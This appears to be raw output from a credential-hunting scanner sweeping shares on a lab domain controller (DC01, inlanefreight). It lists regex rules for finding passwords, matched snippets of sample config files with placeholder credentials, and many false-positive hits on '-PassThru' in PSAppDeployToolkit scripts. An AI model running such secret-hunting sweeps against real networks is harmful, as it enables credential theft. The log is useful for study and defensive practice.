-->\r\n\ \ <connectionStrings>\r\n\ \ \ \ <add\ name="SqlServerConnection"\r\n\ \ \ \ \ \ \ \ \ connectionString="Data\ Source=localhost;Initial\ Catalog=myDB;User\ ID=myUser;Password=myPass;"\r\n\ \ \ \ \ \ \ \ \ providerName="System\.Data\.SqlClient"\ />\r\n\ \ \ \ <add\ name="SqlServerIntegratedSecurity"\r\n\ \ \ \ \ \ \ \ \ connectionString="D [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:15Z [File] {Yellow}<KeepDbConnStringPw|R|connectionstring.{1,200}passw|7.5kB|2025-05-01 16:37:04Z>(\\DC01.inlanefreight.local\C$\Users\Public\PowerHuntShares\Scripts\SampleConfigs\machine.config) sword"\ />\r\n\ \ </serviceCredentials>\ \ \ \r\n\r\n\ \ <!--\ Connection\ string\ settings\ -->\r\n\ \ <connectionStrings>\r\n\ \ \ \ <!--\ SQL\ Server\ \(Standard\ Authentication\)\ -->\r\n\ \ \ \ <add\ name="SqlServerConnection"\r\n\ \ \ \ \ \ \ \ \ connectionString="Data\ Source=localhost;Initial\ Catalog=myDB;User\ ID=myUser;Password=myPass;"\r\n\ \ \ \ \ \ \ \ \ providerName="System\.Data\.SqlClient"\ />\r\n\r\n\ \ \ \ <!--\ SQL\ Server\ \(Windows\ Authentication\)\ -->\r\n\ \ \ [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:15Z [File] {Yellow}<KeepCSharpDbConnStringsYellow|R|Data Source=.+Integrated Security=(SSPI|true)|4kB|2025-05-01 16:37:04Z>(\\DC01.inlanefreight.local\C$\Users\Public\PowerHuntShares\Scripts\SampleConfigs\app.config) "Data\ Source=localhost;Initial\ Catalog=myDB;User\ ID=myUser;Password=myPass;"\r\n\ \ \ \ \ \ \ \ \ providerName="System\.Data\.SqlClient"\ />\r\n\ \ \ \ <add\ name="SqlServerIntegratedSecurity"\r\n\ \ \ \ \ \ \ \ \ connectionString="Data\ Source=localhost;Initial\ Catalog=myDB;Integrated\ Security=True;"\r\n\ \ \ \ \ \ \ \ \ providerName="System\.Data\.SqlClient"\ />\r\n\ \ \ \ <add\ name="MySqlConnection"\r\n\ \ \ \ \ \ \ \ \ connectionString="Server=localhost;Da [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:15Z [File] {Red}<KeepCSharpDbConnStringsRed|R|Data Source=.+(;|)Password=.+(;|)|7.5kB|2025-05-01 16:37:04Z>(\\DC01.inlanefreight.local\C$\Users\Public\PowerHuntShares\Scripts\SampleConfigs\machine.config) viceCredentials>\ \ \ \r\n\r\n\ \ <!--\ Connection\ string\ settings\ -->\r\n\ \ <connectionStrings>\r\n\ \ \ \ <!--\ SQL\ Server\ \(Standard\ Authentication\)\ -->\r\n\ \ \ \ <add\ name="SqlServerConnection"\r\n\ \ \ \ \ \ \ \ \ connectionString="Data\ Source=localhost;Initial\ Catalog=myDB;User\ ID=myUser;Password=myPass;"\r\n\ \ \ \ \ \ \ \ \ providerName="System\.Data\.SqlClient"\ />\r\n\r\n\ \ \ \ <!--\ SQL\ Server\ \(Windows\ Authentication\)\ -->\r\n\ \ \ \ <add\ name="SqlSer [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:15Z [File] {Red}<KeepPassOrKeyInCode|R|passw?o?r?d\s*=\s*[\'\"][^\'\"]....|5.6kB|2025-05-01 16:37:04Z>(\\DC01.inlanefreight.local\C$\Users\Public\PowerHuntShares\Scripts\SampleConfigs\web.config) tion\ settings\ for\ web\ applications\ -->\r\n\ \ \ \ <authentication\ mode="Forms">\r\n\ \ \ \ \ \ <forms\ loginUrl="login\.aspx"\ timeout="30">\r\n\ \ \ \ \ \ \ \ <credentials\ passwordFormat="Clear">\r\n\ \ \ \ \ \ \ \ \ \ <user\ name="user1"\ password="password1"\ />\r\n\ \ \ \ \ \ \ \ \ \ <user\ name="user2"\ password="password2"\ />\r\n\ \ \ \ \ \ \ \ </credentials>\r\n\ \ \ \ \ \ </forms>\r\n\ \ \ \ </authentication>\r\n\r\n\ \ \ \ <!--\ Authorization\ settings\ to\ allow\ or\ deny\ user\ ac [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:15Z [File] {Red}<KeepPassOrKeyInCode|R|passw?o?r?d\s*=\s*[\'\"][^\'\"]....|4kB|2025-05-01 16:37:04Z>(\\DC01.inlanefreight.local\C$\Users\Public\PowerHuntShares\Scripts\SampleConfigs\app.config) web>\r\n\ \ \ \ <compilation\ debug="true"\ />\r\n\ \ \ \ <authentication\ mode="Forms">\r\n\ \ \ \ \ \ <forms\ loginUrl="login\.aspx"\ timeout="30">\r\n\ \ \ \ \ \ \ \ <credentials\ passwordFormat="Clear">\r\n\ \ \ \ \ \ \ \ \ \ <user\ name="user1"\ password="password1"\ />\r\n\ \ \ \ \ \ \ \ \ \ <user\ name="user2"\ password="password2"\ />\r\n\ \ \ \ \ \ \ \ </credentials>\r\n\ \ \ \ \ \ </forms>\r\n\ \ \ \ </authentication>\r\n\ \ \ \ <customErrors\ mode="Off"\ />\r\n\ \ </system\.web>\r\n\r\n\ \ <!-- [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:15Z [File] {Yellow}<KeepCSharpDbConnStringsYellow|R|Data Source=.+Integrated Security=(SSPI|true)|7.5kB|2025-05-01 16:37:04Z>(\\DC01.inlanefreight.local\C$\Users\Public\PowerHuntShares\Scripts\SampleConfigs\machine.config) myUser;Password=myPass;"\r\n\ \ \ \ \ \ \ \ \ providerName="System\.Data\.SqlClient"\ />\r\n\r\n\ \ \ \ <!--\ SQL\ Server\ \(Windows\ Authentication\)\ -->\r\n\ \ \ \ <add\ name="SqlServerIntegratedSecurity"\r\n\ \ \ \ \ \ \ \ \ connectionString="Data\ Source=localhost;Initial\ Catalog=myDB;Integrated\ Security=True;"\r\n\ \ \ \ \ \ \ \ \ providerName="System\.Data\.SqlClient"\ />\r\n\r\n\ \ \ \ <!--\ SQL\ Server\ \(Encrypted\ Connection\)\ -->\r\n\ \ \ \ <add\ name="SqlServerEncry [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:15Z [File] {Yellow}<KeepDbConnStringPw|R|connectionstring.{1,200}passw|4kB|2025-05-01 16:37:04Z>(\\DC01.inlanefreight.local\C$\Users\Public\PowerHuntShares\Scripts\SampleConfigs\app.config) \ \ \ \ <add\ key="Password"\ value="customPassword"\ />\r\n\ \ </serviceCredentials>\r\n\r\n\ \ <!--\ Connection\ strings\ for\ various\ databases\ -->\r\n\ \ <connectionStrings>\r\n\ \ \ \ <add\ name="SqlServerConnection"\r\n\ \ \ \ \ \ \ \ \ connectionString="Data\ Source=localhost;Initial\ Catalog=myDB;User\ ID=myUser;Password=myPass;"\r\n\ \ \ \ \ \ \ \ \ providerName="System\.Data\.SqlClient"\ />\r\n\ \ \ \ <add\ name="SqlServerIntegratedSecurity"\r\n\ \ \ \ \ \ \ \ \ c [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:15Z [File] {Red}<KeepPassOrKeyInCode|R|[\s]+-passw?o?r?d?|16.6kB|2025-05-01 16:09:18Z>(\\DC01.inlanefreight.local\IT\Tools\PSAppDeployToolkit-main\src\Tests\Unit.Inactive\Copy-File.Tests.ps1) Out-Null\n\n\ \ \ \ \ \ \ \ Set-Content\ -Path\ "\$SourcePath\\Subfolder3\\old\.txt"\ -Value\ 'old\ file'\n\ \ \ \ \ \ \ \ Set-ItemProperty\ -Path\ "\$SourcePath\\Subfolder3\\old\.txt"\ -Name\ LastWriteTime\ -Value\ \(Get-Date\)\.AddDays\(-1\)\ -PassThru\ \|\ Set-ItemProperty\ -Name\ CreationTime\ -Value\ \(Get-Date\)\.AddDays\(-1\)\n\ \ \ \ \ \ \ \ Set-ItemProperty\ -Path\ "\$SourcePath\\Subfolder3\\hidden\.txt"\ -Name\ Attributes\ -Value\ 'Hidden'\n\ \ \ \ \ \ \ \ Set-ItemPrope [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:15Z [File] {Red}<KeepPassOrKeyInCode|R|[\s]+-passw?o?r?d?|13kB|2025-05-01 16:09:18Z>(\\DC01.inlanefreight.local\IT\Tools\PSAppDeployToolkit-main\src\Tests\Unit.Inactive\Execute-ProcessAsUser.Tests.ps1) ilentlyContinue\ \|\ Out-Null\n\ \ \ \ }\n\n\ \ \ \ Context\ 'cmd\.exe'\ \{\n\ \ \ \ \ \ \ \ It\ 'Should\ run\ cmd\.exe'\ \{\n\ \ \ \ \ \ \ \ \ \ \ \ \$ProcessExitCode\ =\ Execute-ProcessAsUser\ -Path\ 'cmd\.exe'\ -Parameters\ '/c\ echo\ Hello\ World'\ -Wait\ -PassThru\n\ \ \ \ \ \ \ \ \ \ \ \ \$ProcessExitCode\ \|\ Should\ -Be\ 0\n\ \ \ \ \ \ \ \ }\n\ \ \ \ \ \ \ \ It\ 'Should\ return\ exit\ codes'\ \{\n\ \ \ \ \ \ \ \ \ \ \ \ \$ProcessExitCode\ =\ Execute-ProcessAsUser\ -Path\ 'cmd\.exe'\ -Parameters\ '/c\ exit\ 42'\ - [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:15Z [File] {Yellow}<KeepDbConnStringPw|R|connectionstring.{1,200}passw|5.6kB|2025-05-01 16:37:04Z>(\\DC01.inlanefreight.local\C$\Users\Public\PowerHuntShares\Scripts\SampleConfigs\web.config) \ \ \ \ <add\ key="Password"\ value="customPassword"\ />\r\n\ \ </serviceCredentials>\r\n\r\n\ \ <!--\ Connection\ strings\ for\ various\ databases\ -->\r\n\ \ <connectionStrings>\r\n\ \ \ \ <add\ name="SqlServerConnection"\r\n\ \ \ \ \ \ \ \ \ connectionString="Data\ Source=localhost;Initial\ Catalog=myDB;User\ ID=myUser;Password=myPass;"\r\n\ \ \ \ \ \ \ \ \ providerName="System\.Data\.SqlClient"\ />\r\n\ \ \ \ <add\ name="SqlServerIntegratedSecurity"\r\n\ \ \ \ \ \ \ \ \ c [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:15Z [File] {Red}<KeepPassOrKeyInCode|R|passw?o?r?d\s*=\s*[\'\"][^\'\"]....|7.5kB|2025-05-01 16:37:04Z>(\\DC01.inlanefreight.local\C$\Users\Public\PowerHuntShares\Scripts\SampleConfigs\machine.config) ="Forms">\r\n\ \ \ \ \ \ <!--\ Forms\ authentication\ with\ username\ and\ password\ -->\r\n\ \ \ \ \ \ <forms\ loginUrl="login\.aspx"\ timeout="30">\r\n\ \ \ \ \ \ \ \ <credentials\ passwordFormat="Clear">\r\n\ \ \ \ \ \ \ \ \ \ <user\ name="user1"\ password="password1"\ />\r\n\ \ \ \ \ \ \ \ \ \ <user\ name="user2"\ password="password2"\ />\r\n\ \ \ \ \ \ \ \ </credentials>\r\n\ \ \ \ \ \ </forms>\r\n\ \ \ \ </authentication>\r\n\ \ \ \ <customErrors\ mode="Off"\ />\r\n\ \ </system\.web>\r\n\r\n\ \ <!-- [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:15Z [File] {Red}<KeepCSharpDbConnStringsRed|R|Data Source=.+(;|)Password=.+(;|)|5.6kB|2025-05-01 16:37:04Z>(\\DC01.inlanefreight.local\C$\Users\Public\PowerHuntShares\Scripts\SampleConfigs\web.config) word"\ value="customPassword"\ />\r\n\ \ </serviceCredentials>\r\n\r\n\ \ <!--\ Connection\ strings\ for\ various\ databases\ -->\r\n\ \ <connectionStrings>\r\n\ \ \ \ <add\ name="SqlServerConnection"\r\n\ \ \ \ \ \ \ \ \ connectionString="Data\ Source=localhost;Initial\ Catalog=myDB;User\ ID=myUser;Password=myPass;"\r\n\ \ \ \ \ \ \ \ \ providerName="System\.Data\.SqlClient"\ />\r\n\ \ \ \ <add\ name="SqlServerIntegratedSecurity"\r\n\ \ \ \ \ \ \ \ \ connectionString="D [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:15Z [File] {Red}<KeepPassOrKeyInCode|R|[\s]+-passw?o?r?d?|16.4kB|2025-05-01 16:09:18Z>(\\DC01.inlanefreight.local\IT\Tools\PSAppDeployToolkit-main\src\Tests\Unit\Copy-ADTFile.Tests.ps1) Out-Null\n\n\ \ \ \ \ \ \ \ Set-Content\ -Path\ "\$SourcePath\\Subfolder3\\old\.txt"\ -Value\ 'old\ file'\n\ \ \ \ \ \ \ \ Set-ItemProperty\ -Path\ "\$SourcePath\\Subfolder3\\old\.txt"\ -Name\ LastWriteTime\ -Value\ \(Get-Date\)\.AddDays\(-1\)\ -PassThru\ \|\ Set-ItemProperty\ -Name\ CreationTime\ -Value\ \(Get-Date\)\.AddDays\(-1\)\n\ \ \ \ \ \ \ \ Set-ItemProperty\ -Path\ "\$SourcePath\\Subfolder3\\hidden\.txt"\ -Name\ Attributes\ -Value\ 'Hidden'\n\ \ \ \ \ \ \ \ Set-ItemPrope [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:16Z [File] {Yellow}<KeepCSharpDbConnStringsYellow|R|Data Source=.+Integrated Security=(SSPI|true)|5.6kB|2025-05-01 16:37:04Z>(\\DC01.inlanefreight.local\C$\Users\Public\PowerHuntShares\Scripts\SampleConfigs\web.config) "Data\ Source=localhost;Initial\ Catalog=myDB;User\ ID=myUser;Password=myPass;"\r\n\ \ \ \ \ \ \ \ \ providerName="System\.Data\.SqlClient"\ />\r\n\ \ \ \ <add\ name="SqlServerIntegratedSecurity"\r\n\ \ \ \ \ \ \ \ \ connectionString="Data\ Source=localhost;Initial\ Catalog=myDB;Integrated\ Security=True;"\r\n\ \ \ \ \ \ \ \ \ providerName="System\.Data\.SqlClient"\ />\r\n\ \ \ \ <add\ name="MySqlConnection"\r\n\ \ \ \ \ \ \ \ \ connectionString="Server=localhost;Da [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:16Z [File] {Yellow}<KeepDbConnStringPw|R|connectionstring.{1,200}passw|7.5kB|2025-05-01 16:37:04Z>(\\DC01.inlanefreight.local\C$\Users\Public\PowerHuntShares\Scripts\SampleConfigs\machine.config) sword"\ />\r\n\ \ </serviceCredentials>\ \ \ \r\n\r\n\ \ <!--\ Connection\ string\ settings\ -->\r\n\ \ <connectionStrings>\r\n\ \ \ \ <!--\ SQL\ Server\ \(Standard\ Authentication\)\ -->\r\n\ \ \ \ <add\ name="SqlServerConnection"\r\n\ \ \ \ \ \ \ \ \ connectionString="Data\ Source=localhost;Initial\ Catalog=myDB;User\ ID=myUser;Password=myPass;"\r\n\ \ \ \ \ \ \ \ \ providerName="System\.Data\.SqlClient"\ />\r\n\r\n\ \ \ \ <!--\ SQL\ Server\ \(Windows\ Authentication\)\ -->\r\n\ \ \ [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:16Z [File] {Red}<KeepPassOrKeyInCode|R|passw?o?r?d\s*=\s*[\'\"][^\'\"]....|5.6kB|2025-05-01 16:37:04Z>(\\DC01.inlanefreight.local\C$\Users\Public\PowerHuntShares\Scripts\SampleConfigs\web.config) tion\ settings\ for\ web\ applications\ -->\r\n\ \ \ \ <authentication\ mode="Forms">\r\n\ \ \ \ \ \ <forms\ loginUrl="login\.aspx"\ timeout="30">\r\n\ \ \ \ \ \ \ \ <credentials\ passwordFormat="Clear">\r\n\ \ \ \ \ \ \ \ \ \ <user\ name="user1"\ password="password1"\ />\r\n\ \ \ \ \ \ \ \ \ \ <user\ name="user2"\ password="password2"\ />\r\n\ \ \ \ \ \ \ \ </credentials>\r\n\ \ \ \ \ \ </forms>\r\n\ \ \ \ </authentication>\r\n\r\n\ \ \ \ <!--\ Authorization\ settings\ to\ allow\ or\ deny\ user\ ac [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:16Z [File] {Yellow}<KeepDbConnStringPw|R|connectionstring.{1,200}passw|5.6kB|2025-05-01 16:37:04Z>(\\DC01.inlanefreight.local\C$\Users\Public\PowerHuntShares\Scripts\SampleConfigs\web.config) \ \ \ \ <add\ key="Password"\ value="customPassword"\ />\r\n\ \ </serviceCredentials>\r\n\r\n\ \ <!--\ Connection\ strings\ for\ various\ databases\ -->\r\n\ \ <connectionStrings>\r\n\ \ \ \ <add\ name="SqlServerConnection"\r\n\ \ \ \ \ \ \ \ \ connectionString="Data\ Source=localhost;Initial\ Catalog=myDB;User\ ID=myUser;Password=myPass;"\r\n\ \ \ \ \ \ \ \ \ providerName="System\.Data\.SqlClient"\ />\r\n\ \ \ \ <add\ name="SqlServerIntegratedSecurity"\r\n\ \ \ \ \ \ \ \ \ c [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:16Z [File] {Red}<KeepPassOrKeyInCode|R|[\s]+-passw?o?r?d?|3.3kB|2025-05-01 16:09:16Z>(\\DC01.inlanefreight.local\IT\Tools\PSAppDeployToolkit-main\src\PSAppDeployToolkit\Private\Get-ADTRunningProcesses.ps1) ts\.Name\ -ErrorAction\ Ignore\ \|\ &\ \{\n\ \ \ \ \ \ \ \ process\n\ \ \ \ \ \ \ \ \{\n\ \ \ \ \ \ \ \ \ \ \ \ if\ \(!\$_\.HasExited\)\n\ \ \ \ \ \ \ \ \ \ \ \ \{\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ return\ \$_\ \|\ Add-Member\ -MemberType\ NoteProperty\ -Name\ ProcessDescription\ -Force\ -PassThru\ -Value\ \$\(\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ if\ \(!\[System\.String]::IsNullOrWhiteSpace\(\(\$objDescription\ =\ \$ProcessObjects\ \|\ Where-Object\ -Property\ Name\ -EQ\ -Value\ \$_\.ProcessName\ \|\ Select-Object\ -ExpandProp [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:16Z [File] {Red}<KeepPassOrKeyInCode|R|[\s]+-passw?o?r?d?|2.8kB|2025-05-01 16:09:16Z>(\\DC01.inlanefreight.local\IT\Tools\PSAppDeployToolkit-main\src\PSAppDeployToolkit\Private\Show-ADTHelpConsoleInternal.ps1) \ Import\ the\ module\ and\ store\ its\ passthru\ data\ so\ we\ can\ access\ it\ later\.\n\ \ \ \ \$module\ =\ Import-Module\ -FullyQualifiedName\ \(\[Microsoft\.PowerShell\.Commands\.ModuleSpecification]::new\(\$PSBoundParameters\)\)\ -PassThru\n\n\ \ \ \ \#\ Build\ out\ the\ form's\ listbox\.\n\ \ \ \ \$helpListBox\ =\ \[System\.Windows\.Forms\.ListBox]::new\(\)\n\ \ \ \ \$helpListBox\.ClientSize\ =\ \[System\.Drawing\.Size]::new\(261,\ 675\)\n\ \ \ \ \$helpListBox\.Font\ =\ \[Sys [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:16Z [File] {Red}<KeepPassOrKeyInCode|R|[\s]+-passw?o?r?d?|5.3kB|2025-05-01 16:09:16Z>(\\DC01.inlanefreight.local\IT\Tools\PSAppDeployToolkit-main\src\PSAppDeployToolkit\Private\Invoke-ADTServiceAndDependencyOperation.ps1) \ Stop\ the\ parent\ service\.\n\ \ \ \ \ \ \ \ Write-ADTLogEntry\ -Message\ "Stopping\ parent\ service\ \[\$\(\$Service\.ServiceName\)]\ with\ display\ name\ \[\$\(\$Service\.DisplayName\)]\."\n\ \ \ \ \ \ \ \ \$Service\ =\ \$Service\ \|\ Stop-Service\ -PassThru\ -WarningAction\ Ignore\ -Force\n\ \ \ \ }\n\ \ \ \ elseif\ \(\(\$Operation\ -eq\ 'Start'\)\ -and\ \(\$Service\.Status\ -ne\ 'Running'\)\)\n\ \ \ \ \{\n\ \ \ \ \ \ \ \ \#\ Start\ the\ parent\ service\.\n\ \ \ \ \ \ \ \ Write-ADTLogEntry\ -Message\ "S [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:16Z [File] {Red}<KeepPassOrKeyInCode|R|[\s]+-passw?o?r?d?|4.9kB|2025-05-01 16:09:16Z>(\\DC01.inlanefreight.local\IT\Tools\PSAppDeployToolkit-main\src\PSAppDeployToolkit\Public\Add-ADTEdgeExtension.ps1) ert\ the\ result\ back\ to\ JSON\.\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \$extensionsSettings\ =\ Get-ADTEdgeExtensions\ \|\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ Add-Member\ -Name\ \$ExtensionID\ -Value\ \$additionalExtension\ -MemberType\ NoteProperty\ -Force\ -PassThru\ \|\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ ConvertTo-Json\ -Compress\n\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \#\ Add\ the\ additional\ extension\ to\ the\ current\ values,\ then\ re-write\ the\ definition\ in\ the\ registry\.\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \$null\ =\ S [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:16Z [File] {Red}<KeepPassOrKeyInCode|R|[\s]+-passw?o?r?d?|8kB|2025-05-01 16:09:16Z>(\\DC01.inlanefreight.local\IT\Tools\PSAppDeployToolkit-main\src\PSAppDeployToolkit\Public\Block-ADTAppExecution.ps1) \(\$Script:PSScriptRoot\)\\\$\(\$MyInvocation\.MyCommand\.Module\.Name\)\.psd1"\.Replace\("'",\ "''"\)\)';\ Guid\ =\ '\$\(\$MyInvocation\.MyCommand\.Module\.Guid\)';\ ModuleVersion\ =\ '\$\(\$MyInvocation\.MyCommand\.Module\.Version\)'\ }\ -PassThru\)\ \{\ &\ `\$CommandTable\.'Initialize-ADTModule'\ -ScriptDirectory\ '\$\(\$Script:ADT\.Directories\.Script\.Replace\("'",\ "''"\)\)';\ `\$null\ =\ &\ `\$CommandTable\.'Show-ADTInstallationPrompt\$\(\$adtConfig\.UI\.Dial [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:16Z [File] {Red}<KeepPassOrKeyInCode|R|[\s]+-passw?o?r?d?|4kB|2025-05-01 16:09:17Z>(\\DC01.inlanefreight.local\IT\Tools\PSAppDeployToolkit-main\src\PSAppDeployToolkit\Public\Get-ADTPEFileArchitecture.ps1) cture\ of\ \[\$peArchEnum]\."\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ if\ \(\$PassThru\)\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \{\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ return\ \(\$Path\ \|\ Add-Member\ -MemberType\ NoteProperty\ -Name\ BinaryType\ -Value\ \$peArchEnum\ -Force\ -PassThru\)\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ }\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ return\ \$peArchEnum\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ }\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ catch\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \{\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ Write-Error\ -ErrorRecord\ \$_\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ }\n\ \ \ [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:16Z [File] {Red}<KeepPassOrKeyInCode|R|[\s]+-passw?o?r?d?|24.5kB|2025-05-01 16:09:16Z>(\\DC01.inlanefreight.local\IT\Tools\PSAppDeployToolkit-main\src\PSAppDeployToolkit\Public\Copy-ADTFile.ps1) ntry\ -Message\ "Executing\ Robocopy\ command:\ \$robocopyCommand\ \$robocopyArgs"\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \$robocopyResult\ =\ Start-ADTProcess\ -FilePath\ \$robocopyCommand\ -ArgumentList\ \$robocopyArgs\ -CreateNoWindow\ -PassThru\ -SuccessExitCodes\ 0,\ 1,\ 2,\ 3,\ 4,\ 5,\ 6,\ 7,\ 8\ -ErrorAction\ Ignore\n\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \#\ Trim\ the\ last\ line\ plus\ leading\ whitespace\ from\ each\ line\ of\ Robocopy\ output\.\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \$rob [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:16Z [File] {Red}<KeepPassOrKeyInCode|R|[\s]+-passw?o?r?d?|7.7kB|2025-05-01 16:09:17Z>(\\DC01.inlanefreight.local\IT\Tools\PSAppDeployToolkit-main\src\PSAppDeployToolkit\Public\Invoke-ADTRegSvr32.ps1) \ \ }\n\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \#\ Register\ the\ DLL\ file\ and\ measure\ the\ success\.\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ if\ \(\(\$ExecuteResult\ =\ Start-ADTProcess\ -FilePath\ \$RegSvr32Path\ -ArgumentList\ \$ActionParameters\ -WindowStyle\ Hidden\ -PassThru\)\.ExitCode\ -ne\ 0\)\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \{\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ if\ \(\$ExecuteResult\.ExitCode\ -eq\ 60002\)\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \{\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \$naerParams\ =\ @\{\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ Exce [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:16Z [File] {Red}<KeepPassOrKeyInCode|R|[\s]+-passw?o?r?d?|17.6kB|2025-05-01 16:09:17Z>(\\DC01.inlanefreight.local\IT\Tools\PSAppDeployToolkit-main\src\PSAppDeployToolkit\Public\Open-ADTSession.ps1) nal\ arguments\ passed\ to\ the\ function\.\n\n\ \ \ \ \.INPUTS\n\ \ \ \ \ \ \ \ None\n\n\ \ \ \ \ \ \ \ You\ cannot\ pipe\ objects\ to\ this\ function\.\n\n\ \ \ \ \.OUTPUTS\n\ \ \ \ \ \ \ \ ADTSession\n\n\ \ \ \ \ \ \ \ This\ function\ returns\ the\ session\ object\ if\ -PassThru\ is\ specified\.\n\n\ \ \ \ \.EXAMPLE\n\ \ \ \ \ \ \ \ Open-ADTSession\ -SessionState\ \$ExecutionContext\.SessionState\ -DeploymentType\ "Install"\ -DeployMode\ "Interactive"\n\n\ \ \ \ \ \ \ \ Opens\ a\ new\ ADT\ session\ with\ th [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:17Z [File] {Red}<KeepPassOrKeyInCode|R|[\s]+-passw?o?r?d?|10.8kB|2025-05-01 16:09:17Z>(\\DC01.inlanefreight.local\IT\Tools\PSAppDeployToolkit-main\src\PSAppDeployToolkit\Public\Show-ADTInstallationPrompt.ps1) \(\$Script:PSScriptRoot\)\\\$\(\$MyInvocation\.MyCommand\.Module\.Name\)\.psd1"\.Replace\("'",\ "''"\)\)';\ Guid\ =\ '\$\(\$MyInvocation\.MyCommand\.Module\.Guid\)';\ ModuleVersion\ =\ '\$\(\$MyInvocation\.MyCommand\.Module\.Version\)'\ }\ -PassThru\)\ \{\ &\ `\$CommandTable\.'Initialize-ADTModule'\ -ScriptDirectory\ '\$\(\$Script:ADT\.Directories\.Script\.Replace\("'",\ "''"\)\)';\ `\$null\ =\ &\ `\$CommandTable\.'\$\(\$MyInvocation\.MyCommand\.Name\)\$\(\$adtConfig\.UI [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:17Z [File] {Red}<KeepPassOrKeyInCode|R|[\s]+-passw?o?r?d?|9.2kB|2025-05-01 16:09:17Z>(\\DC01.inlanefreight.local\IT\Tools\PSAppDeployToolkit-main\src\PSAppDeployToolkit\Public\Show-ADTInstallationRestartPrompt.ps1) \(\$Script:PSScriptRoot\)\\\$\(\$MyInvocation\.MyCommand\.Module\.Name\)\.psd1"\.Replace\("'",\ "''"\)\)';\ Guid\ =\ '\$\(\$MyInvocation\.MyCommand\.Module\.Guid\)';\ ModuleVersion\ =\ '\$\(\$MyInvocation\.MyCommand\.Module\.Version\)'\ }\ -PassThru\)\ \{\ &\ `\$CommandTable\.'Initialize-ADTModule'\ -ScriptDirectory\ '\$\(\$Script:ADT\.Directories\.Script\.Replace\("'",\ "''"\)\)';\ `\$null\ =\ &\ `\$CommandTable\.'\$\(\$MyInvocation\.MyCommand\.Name\)\$\(\$adtConfig\.UI [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:17Z [File] {Red}<KeepPassOrKeyInCode|R|[\s]+-passw?o?r?d?|6.8kB|2025-05-01 16:09:17Z>(\\DC01.inlanefreight.local\IT\Tools\PSAppDeployToolkit-main\src\PSAppDeployToolkit\Public\Test-ADTBattery.ps1) ests\ whether\ the\ local\ machine\ is\ running\ on\ AC\ power\ or\ not\.\n\n\ \ \ \ \.DESCRIPTION\n\ \ \ \ \ \ \ \ Tests\ whether\ the\ local\ machine\ is\ running\ on\ AC\ power\ and\ returns\ true/false\.\ For\ detailed\ information,\ use\ the\ -PassThru\ option\ to\ get\ a\ hashtable\ containing\ various\ battery\ and\ power\ status\ properties\.\n\n\ \ \ \ \.PARAMETER\ PassThru\n\ \ \ \ \ \ \ \ Outputs\ a\ hashtable\ containing\ the\ following\ properties:\n\ \ \ \ \ \ \ \ -\ IsLapto [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:17Z [File] {Red}<KeepPassOrKeyInCode|R|[\s]+-passw?o?r?d?|25.2kB|2025-05-01 16:09:17Z>(\\DC01.inlanefreight.local\IT\Tools\PSAppDeployToolkit-main\src\PSAppDeployToolkit\Public\Start-ADTMsiProcess.ps1) :\ \$false\n\n\ \ \ \ \.INPUTS\n\ 